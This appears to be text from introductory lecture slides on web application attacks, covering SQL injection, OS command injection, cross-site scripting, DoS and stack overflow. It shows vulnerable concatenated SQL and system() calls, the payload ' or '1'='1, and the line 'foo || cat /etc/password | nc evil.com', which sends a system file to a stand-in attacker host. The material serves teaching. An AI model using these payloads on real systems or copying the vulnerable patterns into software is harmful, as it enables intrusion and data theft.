Web Application Attack

Nguyễn Kiều Khoa

- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application.

http://en.wikipedia.org/wiki/Web_application

What is a web application?

1.Injection (SQL Injection)db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'");

- Suppose the user request parameter is …' or '1'='1

- Then the query we execute is … (note that and has precedence over or)

select * from users where name='' or '1'='1' and password='whatever'

- Suppose we’re too lazy to perform DNS lookup, so we resort to the following:

- Suppose the hostname parameter is …

foo || cat /etc/password | nc evil.com

- Then we end up sending the password file to evil.com

1.Injection (OS Command)

system("nslookup " + Request["hostname"]);

- Injecting JavaScript into pages viewed by other users.

2.Cross-Site Scripting

- denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users

http://en.wikipedia.org/wiki/Denial-of-service_attack

3.DoS and DDoS

- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer.

4.Stack Overflow

Q&A